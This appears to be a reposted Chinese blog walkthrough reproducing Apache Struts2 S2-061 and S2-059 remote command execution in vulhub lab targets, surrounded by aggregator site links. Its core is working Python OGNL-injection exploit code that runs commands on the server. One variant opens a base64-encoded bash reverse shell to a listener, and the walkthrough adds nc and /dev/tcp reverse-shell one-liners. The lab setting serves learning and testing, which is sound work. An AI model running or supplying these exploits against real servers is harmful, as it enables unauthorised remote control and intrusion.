码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 命令执行漏洞【2】vulhub远程命令执行漏洞复现


    1.vulhub安装启动靶场环境

    (1)s2-061开启靶场




    (2)s2-059开启靶场


    2.漏洞复现

    (1)s2-061漏洞复现
    github获取漏洞利用工具

    开始利用

    (2)s2-059漏洞复现



    在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.

    可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功

    利用POC如下:

    1. import requests
    2. url = "http://10.1.1.101:8080"
    3. data1 = {
    4. "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
    5. }
    6. data2 = {
    7. "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('touch /tmp/success'))}"
    8. }
    9. res1 = requests.post(url, data=data1)
    10. # print(res1.text)
    11. res2 = requests.post(url, data=data2)
    12. # print(res2.text)

    3.反弹shell

    控制端   nc -lvvp 6666
    被控制端   nc 10.1.1.101 6666 -e /bin/bash
                     bash -i >& /dev/tcp/10.1.1.101/6666 0>&1           (被控制端未装nc,就可以使用bash(linux都能连接))

    https://www.cnblogs.com/lingzhisec/p/13917529.html
    受害端执行反弹shell命令


    控制端进行监听

    执行反弹shell的POC如下:

    1. import requests
    2. url = "http://10.1.1.101:8080"
    3. data1 = {
    4. "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
    5. }
    6. data2 = {
    7. "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTAwLzY2NjYgMD4mMQo=}|{base64,-d}|{bash,-i}'))}"
    8. }
    9. res1 = requests.post(url, data=data1)
    10. res2 = requests.post(url, data=data2)
  • 相关阅读:
    “蔚来杯“2022牛客暑期多校训练营(加赛) K.Killer Sajin‘s Matrix
    中国象棋(人机)
    【RT学习笔记1】RT-Thread外设例程——I/O口控制(高低电平、中断)
    python requests请求接口返回304问题解决
    按规划安装配置DNS及NSX Advanced Load Balance(AVI)
    蓝桥杯每日一题2023.10.11
    Fastdfs图片上传 配置Fastdfs在linux------基于SpringBoot
    手把手教你,如何利用积木易搭3D扫描仪完成文物三维建模?
    HP魔法觉醒自动抢协作和自动社团答题的半成品
    Python自动化测试,web网站怎么测试?全网最详细实战......
  • 原文地址:https://blog.csdn.net/LfanBQX/article/details/138158211
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号